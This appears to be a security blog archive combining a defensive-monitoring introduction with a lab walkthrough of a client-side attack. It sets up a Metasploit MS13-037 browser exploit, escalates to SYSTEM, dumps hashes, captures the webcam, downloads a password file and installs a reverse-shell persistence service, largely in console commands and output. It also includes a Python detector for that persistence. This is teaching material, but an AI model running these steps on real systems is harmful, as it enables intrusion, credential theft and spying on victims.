OSM: Open Security Monitoring

Introduction

I’ve spent most of my career defending environments of all sizes.  What I’ve found is that the job of a defender is much less flashy and far more thankless than that of an “ethical hacker.”  While there are volumes of articles, guides, and talks on penetration testing and the latest attacks, there isn’t much on defending or security monitoring.  With plenty of free tools and exploits for attackers (such as the venerable Kali Linux), there doesn’t seem to be as much excitement for building similar tools for defenders.  In fact, there’s a notion that in order to properly defend a network, you must spend thousands or even millions of dollars.

Enter “Open Security Monitoring”, or “OSM”, which I refer to as a system of integrated open source security tools working together to secure networks of all sizes and all budgets.  Why open source?  There are three specific advantages:

  • Cost: Open source security tools are freely available for anyone to download and install.  This makes the barrier to entry much lower for convincing management to implement these tools.
  • Transparency: The source code can be viewed and edited by anyone, making it clear how it works.  If it doesn’t do something you want it to do, you’re free to modify the code to fit your needs.  I’ve always found the best way to learn and understand something is to take it apart and look at how all the pieces work together.  It’s no different with security tools.
  • Quality: Just because it’s open source and “free”, doesn’t mean it’s a lesser tool than something costing thousands of dollars.  In fact, many are better than anything commercially available because they’re built and supported by a passionate community that isn’t looking to simply make the next big sale.

In this series, I will walk through key OSM components and the relevant tools I’ve used to defend real-world environments:

  • Intrusion Detection/Prevention System
  • Network Security Monitoring
  • Host Intelligence
  • Security Analytics

You could certainly achieve this without using open source tools, but the point here is that you can build a robust security monitoring architecture with limited financial resources.  And if you have some money to spend, open source security tools complement commercial systems well.  Each environment is unique and you’ll likely have a mix of open source and commercial products.

What’s Next

We’ve defined the concept of Open Security Monitoring and why there is a need for open source security tools.  Next, we’ll explore the first of four OSM components, intrusion detection/prevention systems.


Seeing Red: The Fun Stuff

The Fun Stuff: Privilege Escalation, Exfiltration, and Persistence

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we successfully exploited our Victim using a client-side attack targeting an old version of Microsoft Internet Explorer.  We ended with a Meterpreter session confirming our access to the Victim machine.  In this part, we’ll explore the capabilities of Meterpreter including privilege escalation and data exfiltration.

Privilege Escalation

We talked a bit about Meterpreter in the last post, now let’s play with some of its many functions.  Our Meterpreter session is now running under the Notepad process as the lower-privileged “eric” user.  We want to escalate our privileges to give us enhanced system functionality.  In Windows, the highest user is “SYSTEM”.

Meterpreter has a built-in “getsystem” command that will attempt to use various techniques to elevate our user to SYSTEM.  Let’s give it a try.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied.

Hmm, no luck.  No worries, let’s try a local exploit.  MS14-058 seems like a good one.

meterpreter > background
Backgrounding session 1...
msf exploit(ms13_037_svg_dashstyle) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms14_058_track_popup_menu) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(ms14_058_track_popup_menu) > set LPORT 5555
LPORT => 5555
msf exploit(ms14_058_track_popup_menu) > exploit
[*] Started reverse handler on 10.0.1.10:5555
[*] Launching notepad to host the exploit...
[+] Process 1556 launched.
[*] Reflectively injecting the exploit DLL into 1556...
[*] Injecting exploit into 1556...
[*] Exploit injected. Injecting payload into 1556...
[*] Payload injected. Executing exploit...
[*] Sending stage (770048 bytes) to 10.0.1.11
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (10.0.1.10:5555 -> 10.0.1.11:49209) at 2015-07-26 17:04:37 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Success!  We’re now running as SYSTEM.

A Little Bit of Fun

So now what?  The first thing an attacker will likely do is dump password hashes.  This is easy to do with Meterpreter.  These hashes can then be cracked offline, giving us, the Attacker, passwords to try on the Victim’s online accounts.

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
eric:1000:aad3b435b51404eeaad3b435b51404ee:7a08e99f765c50c0f1768692200e6db5:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

How about a screenshot of the desktop?

meterpreter > screenshot
Screenshot saved to: /root/mUSXxVRT.jpeg

[Image: screenshot of the Victim’s desktop captured by Meterpreter]

Got a webcam? Let’s take a picture and stream some video!

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/SCCMCDyI.jpeg

meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: zwuaLciW.html
[*] Streaming...

What files are on the system?  Perhaps a password file…

meterpreter > ls

Listing: c:\Users\eric\Desktop
==============================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40555/r-xr-xr-x 0 dir 2015-07-26 17:13:01 -0500 .
40777/rwxrwxrwx 0 dir 2014-11-11 19:36:51 -0600 ..
100666/rw-rw-rw- 282 fil 2014-11-11 20:06:50 -0600 desktop.ini
100666/rw-rw-rw- 113 fil 2015-07-26 17:12:27 -0500 my_passwords.txt

meterpreter > cat my_passwords.txt
Top Secret Passwords
+ Bank: no-one-will-guess-this-password
+ Email: password!@#$
+ Amazon: shoptilyoudrop192

meterpreter > download my_passwords.txt
[*] downloading: my_passwords.txt -> my_passwords.txt
[*] downloaded : my_passwords.txt -> my_passwords.txt

This is but a small sampling of the many commands Meterpreter provides.  Play with the other commands to see what else Meterpreter can do.

Persistence

Now that we’ve compromised our Victim machine, let’s install a persistent backdoor that allows us back in even if the machine is restarted.  To do this, we’ll generate a backdoor that autostarts and periodically calls back to our Attacker machine.

meterpreter > run persistence -S -i 5 -p 1337 -r 10.0.1.10
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-FDN9DNVQ5IR_20150726.4130/WIN-FDN9DNVQ5IR_20150726.4130.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.0.1.10 LPORT=1337
[*] Persistent agent script is 148420 bytes long
[+] Persistent Script written to C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[*] Executing script C:\Users\eric\AppData\Local\Temp\vkPiHmUdoG.vbs
[+] Agent executed with PID 2008
[*] Installing as service..
[*] Creating service dexYVTDwgSWcORt

Back on our Attacker machine, we’ll set up a Meterpreter handler to accept any incoming connections from our Victim machine.

msf exploit(ms14_058_track_popup_menu) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.0.1.10
LHOST => 10.0.1.10
msf exploit(handler) > set LPORT 1337
LPORT => 1337

Run the handler on the Attacker and restart the Victim machine. If all goes well we should be reconnected as SYSTEM.

msf exploit(handler) > exploit
[*] Started reverse handler on 10.0.1.10:1337
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.0.1.11
[*] Meterpreter session 7 opened (10.0.1.10:1337 -> 10.0.1.11:49161) at 2015-07-26 17:47:55 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Too easy!
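From the defender’s side, the persistence step above leaves very visible artefacts: a new auto-start service with a random name, running as SYSTEM, whose command line launches a .vbs out of a user’s AppData\Local\Temp folder.  The following Python is an added example, not code from the original post or from Metasploit: it reviews constructed Service Control Manager Event ID 7045 (“A service was installed in the system”) records for exactly those traits.  The sample records, the field labels, and the assumed “cmd /c cscript …” launcher are all assumptions for the example; the post does not show the binPath the persistence script registers.

```python
"""
Added example (not from the original post): heuristic review of Windows
Event ID 7045 "A service was installed in the system" records for the traits
of the persistence installed with "run persistence -S": a random-looking
service name, auto start as LocalSystem, and a binary path that runs a .vbs
out of a user's AppData\\Local\\Temp folder.
"""
import re

# CONSTRUCTED sample records. The service name and script path copy the values
# printed in the walkthrough; the "cmd /c cscript ..." launcher is an
# assumption, since the post does not show the registered binPath.
SAMPLE_EVENTS = """\
Event ID: 7045
Service Name:  WinDefend
Service File Name:  "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem

Event ID: 7045
Service Name:  dexYVTDwgSWcORt
Service File Name:  cmd /c cscript //B //NoLogo C:\\Users\\eric\\AppData\\Local\\Temp\\vkPiHmUdoG.vbs
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem

Event ID: 7045
Service Name:  BackupAgent
Service File Name:  C:\\Users\\eric\\AppData\\Local\\Temp\\setup.exe
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  NT AUTHORITY\\LocalService
"""

VOWELS = set("aeiouAEIOU")
FIELD_RE = re.compile(r"^\s*([A-Za-z ]+?):\s*(.*)$")
USER_TEMP_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.IGNORECASE)
SCRIPT_HOST_RE = re.compile(r"\b[cw]script(?:\.exe)?\b.*\.vbs\b", re.IGNORECASE)

# Indicators that justify a closer look on their own (weight 2) versus
# supporting context (weight 1); auto-start as LocalSystem is normal for
# many legitimate services and never flags a record by itself.
STRONG = {"binary path under a user Temp folder", "script host launching a .vbs"}


def parse_7045(text):
    """Split a text export into records (blank-line separated) and keep 7045s."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {}
        for line in block.splitlines():
            m = FIELD_RE.match(line)
            if m:
                rec[m.group(1).strip()] = m.group(2).strip()
        if rec.get("Event ID") == "7045":
            records.append(rec)
    return records


def looks_random(name):
    """Heuristic: generated names are long, vowel-poor and flip case often."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 8:
        return False
    vowel_ratio = sum(c in VOWELS for c in letters) / len(letters)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(letters, letters[1:]))
    return vowel_ratio < 0.2 or flips >= 5


def review_service(rec):
    """Return the list of indicators one 7045 record trips (may be empty)."""
    reasons = []
    name = rec.get("Service Name", "")
    path = rec.get("Service File Name", "")
    if USER_TEMP_RE.search(path):
        reasons.append("binary path under a user Temp folder")
    if SCRIPT_HOST_RE.search(path):
        reasons.append("script host launching a .vbs")
    if looks_random(name):
        reasons.append("random-looking service name")
    auto = "auto" in rec.get("Service Start Type", "").lower()
    if auto and rec.get("Service Account", "").lower() == "localsystem":
        reasons.append("auto-start as LocalSystem")
    return reasons


def score(reasons):
    return sum(2 if r in STRONG else 1 for r in reasons)


def find_suspicious(text, threshold=2):
    """Return (service name, score, reasons) for records at or above threshold."""
    hits = []
    for rec in parse_7045(text):
        reasons = review_service(rec)
        s = score(reasons)
        if s >= threshold:
            hits.append((rec.get("Service Name", "?"), s, reasons))
    return hits


if __name__ == "__main__":
    for name, s, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"{name} (score {s}): {'; '.join(reasons)}")
```

On a real host the same records come from the System log (Service Control Manager, Event ID 7045); the heuristics are deliberately loose, so treat a hit as a lead to verify against the service’s binary, not as a verdict.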

Conclusion

Throughout this series we’ve walked through a typical client-side attack.  We started with a basic understanding of penetration testing tools and what is commonly used.  We performed reconnaissance on our Victim machine and determined what vulnerable software could be exploited.  We then set up a client-side attack and compromised our Victim machine, gaining low-privilege access.  Finally, we executed a local privilege escalation exploit to gain SYSTEM privileges, used Meterpreter to demonstrate our control over the system including data exfiltration, and created a persistent backdoor so we can re-establish access at any time.

Hopefully, this has been an eye-opening experience to see just how easy it is to compromise a system and why it is so important to stay up to date with software patches and apply basic security principles.  In the next series, we’ll investigate how to detect malicious activity and defend a network using open source security tools.


IP360 Tools: Free For All!

Last year, I wrote a couple of articles on how to integrate Tripwire IP360 data into Splunk.  These turned out to be very popular, with a number of folks reaching out to me for a copy of my IP360 Tools script that made all the magic happen.  I hesitated to give the script out since it was originally developed while I was employed at a consulting firm and I wasn’t sure if it was truly mine to give.

However, I’ve always appreciated the free and open source community, especially within the security field.  My own career has benefitted greatly from the use of free open source software and it always made me uneasy that I wasn’t sharing the script.  I’ve since moved on from the consulting firm and they’ve given me permission to do as I please with the script.  Given this, I have decided to make the IP360 Tools script freely available (yay!).

Download IP360 Tools

The script is provided as-is and I offer no support (unless you’ve got some money to burn!).  I also have no plans to continue development.  You’re welcome to use and modify it in any way you see fit.

Enjoy and Happy New Year!


Seeing Red: Exploitation

Exploitation: Client-side Attack

This is part of a series of posts that walk through an attack.  To start from the beginning, click here.

In the last post, we performed some basic reconnaissance on our target machine and determined its operating system, running services, and even what browser was used.  In this part, we’ll set up a client-side attack and gain access to our target machine.

In recent times, client-side attacks have become a very popular way of attacking a machine.  Client-side attacks differ from server-side attacks in that they require some kind of user interaction to successfully execute the exploit.  Phishing, where the sender poses as a legitimate entity that the receiver trusts to entice them into clicking a malicious link or opening a malicious file, is an example of a client-side attack.

We’ll explore setting up a malicious website that hosts our client-side attack.  This is easily accomplished with Kali using Metasploit.  If you recall in our scenario, the target machine, Victim, has joined our “free wireless network” that we have full control over.  This means we also have control over DNS and can redirect Victim to whichever site we please.  This is important in setting up our client-side attack.

Metasploit: MS13-037

The Metasploit Framework (MSF) is an amazing collection of exploits and payloads wrapped in an easy to use command line interface.  There exists a free community-driven version and a commercial paid version.  We’ll be using the free version in Kali to set up our client-side attack.

Since we know that Victim is running Internet Explorer 8, a very old web browser, we’ll look for a client-side attack that can take advantage of this.  After some research, we learn about MS13-037.  This was a Microsoft cumulative security patch for Internet Explorer which addressed several vulnerabilities, including CVE-2013-2551.  From the CVE database description, this is a “use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 [that] allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object.”

This sounds like something we can use.  Let’s see if Metasploit has an available exploit.  We prepare Metasploit for first use by following the instructions from the Kali website.  Open a terminal window and type msfconsole to start up the Metasploit Framework console.

root@kali:~# msfconsole
[*] Starting the Metasploit Framework console...\

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014102901 [core:4.10.0.pre.2014102901 api:1.0.0]]
+ -- --=[ 1369 exploits - 833 auxiliary - 233 post        ]
+ -- --=[ 340 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > 

Now let’s search for an MS13-037 exploit by typing search ms13-037.

msf > search ms13-037

Matching Modules
================

   Name                                            Disclosure Date  Rank    Description
   ----                                            ---------------  ----    -----------
   exploit/windows/browser/ms13_037_svg_dashstyle  2013-03-06       normal  MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow

msf > 

We’re in luck, Metasploit has an available exploit.  Type use exploit/windows/browser/ms13_037_svg_dashstyle to select the exploit and then type show options to view configurable options.

msf > use exploit/windows/browser/ms13_037_svg_dashstyle
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms13_037_svg_dashstyle) > 

This particular Metasploit attack creates a website that will deliver a malicious payload and give us access to our target machine.  The options shown above are specific to how we want to set up the malicious website.  We’ll leave most of these as default but change SRVPORT to 80 (this is the local port on our Attacker machine we want to listen on) and URIPATH to clickme (this is the URI path to use for serving the exploit).  To do this, we’ll type set SRVPORT 80 and set URIPATH clickme and then type show options to confirm the changes.

msf exploit(ms13_037_svg_dashstyle) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms13_037_svg_dashstyle) > set URIPATH clickme
URIPATH => clickme
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Next, let’s configure the exploit target.  It is currently set to Automatic; however, I’ve found that this doesn’t always work.  Let’s see what targets are available by typing show targets and then configure a specific one for Metasploit to use by typing set target followed by the number of a specific option.  We’ll again type show options to confirm our changes.

msf exploit(ms13_037_svg_dashstyle) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 8 on Windows 7 SP1 with JRE ROP
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > set target 2
target => 2
msf exploit(ms13_037_svg_dashstyle) > show options

Module options (exploit/windows/browser/ms13_037_svg_dashstyle):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   OBFUSCATE   false            no        Enable JavaScript obfuscation
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  TLS1             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     clickme          no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   2   IE 8 on Windows 7 SP1 with ntdll.dll Info Leak

msf exploit(ms13_037_svg_dashstyle) > 

We set target to 2 since target 1 is for Internet Explorer with a JRE (Java Runtime Environment), which we don’t have.  So far so good, now let’s set up the malicious payload that will be delivered to the vulnerable client.  Type show payloads to view a list of payloads that are compatible with this exploit.

msf exploit(ms13_037_svg_dashstyle) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/dns_txt_query_exec                                        normal  DNS TXT Record Payload Download and Execution
   windows/download_exec                                             normal  Windows Executable Download (http,https,ftp) and Execute
   windows/exec                                                      normal  Windows Execute Command
   windows/loadlibrary                                               normal  Windows LoadLibrary Path
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/bind_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_hop_http                              normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_https_proxy                           normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/meterpreter/reverse_tcp_rc4                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/meterpreter/reverse_tcp_rc4_dns                           normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/bind_tcp_rc4                             normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupdllinject/reverse_tcp_rc4                          normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupdllinject/reverse_tcp_rc4_dns                      normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager
   windows/patchupmeterpreter/bind_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/reverse_tcp_rc4                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption)
   windows/patchupmeterpreter/reverse_tcp_rc4_dns                    normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/bind_tcp_rc4                                        normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_hop_http                                    normal  Windows Command Shell, Reverse Hop HTTP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                     normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption)
   windows/shell/reverse_tcp_rc4_dns                                 normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_bind_tcp_xpfw                                       normal  Windows Disable Windows ICF, Command Shell, Bind TCP Inline
   windows/shell_hidden_bind_tcp                                     normal  Windows Command Shell, Hidden Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/bind_tcp_rc4                                       normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_hop_http                                   normal  Windows Upload/Execute, Reverse Hop HTTP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/upexec/reverse_tcp_rc4                                    normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption)
   windows/upexec/reverse_tcp_rc4_dns                                normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS)
